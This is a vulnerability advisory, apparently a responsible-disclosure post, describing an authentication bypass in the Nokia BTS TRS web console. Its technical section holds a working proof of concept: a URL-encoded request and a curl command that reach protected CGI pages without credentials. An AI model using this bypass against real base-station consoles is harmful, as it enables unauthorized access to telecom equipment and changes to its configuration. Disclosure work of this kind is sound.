Nokia Transport Module Authentication Bypass

` title: Nokia Transport Module Authentication Bypass  
case id: CM-2020-02  
product: BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)  
vulnerability type: Authentication Bypass  
severity: Critical  
found: 2020-09-28  
CVE: CVE-2021-31932  
by: Cristiano Maruti (@cmaruti)  
  
[EXECUTIVE SUMMARY]  
  
The TRS web console allows an authenticated user to remotely manage the BTS  
and its configuration. The analysis discovered an authentication bypass  
vulnerability (CWE-289) in the web management console. A malicious  
unauthenticated user can get access to all the functionalities exposed via  
the web panel circumventing the authentication process. The vulnerability  
lies in the way the web server in use (lighttpd) protects restricted  
resources and how special characters are encoded and pass to the underline  
CGIs. A successful attack can read data from the BTS and read, modify or  
delete BTS configuration.  
  
[VULNERABLE VERSIONS]  
  
The following version of the TRS web console was affected by the  
vulnerability; previous versions may be vulnerable as well:  
- BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)  
  
[TECHNICAL DETAILS]  
  
It is possible to reproduce the vulnerability following these steps:  
1. Open a web browser and insert the BTS TRS web console IP  
2. Navigate to a protected resource (for example  
/protected/ShowErrorLog.cgi)  
3. Subsitute the dot character with the corresponding URL encoded value  
(%2e)  
4. Resulting URL  
(/protected/ShowErrorLog%2ecgi?token=thisIsNotTheRightToken)  
give access without prompt for any authentication credential  
  
Below a full transcript of the HTTP request used to get access to a  
protected  
resource.  
  
HTTP Request  
-------------------------------------------------------------------------------  
GET /protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken HTTP/1.1  
Host: <targetip>  
User-Agent: curl/7.67.0  
Accept: */*  
  
-------------------------------------------------------------------------------  
cURL PoC  
-------------------------------------------------------------------------------  
# curl -vk https://<targetip>/protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken&frame=showLogFile  
  
  
[VULNERABILITY REFERENCE]  
Mitre assigned the following CVE ID to the vulnerability: CVE-2021-31932  
  
[DISCLOSURE TIMELINE]  
2020-10-06: Contacting Nokia PSIRT and shared the details of the  
vulnerability  
2020-10-07: Nokia PSIRT acknowledge the receipt of the message.  
2021-10-12: Vendor engineering team confirmed the vulnerability and working  
on patch (estimated time end of 2020).  
2021-04-30: Research requested a CVE assignment through MITRE CVE  
Assignment Team; allocated CVE-2021-31932  
2021-05-01: Researcher notified the assigned CVE number to the Vendor  
2022-02-08: Researcher asked for permission to publicly release the report  
to the public; Nokia PSIRT acknowledged  
2022-02-10: Public release  
  
  
--   
  
Cristiano Maruti  
about.me/cmaruti  
  
  
`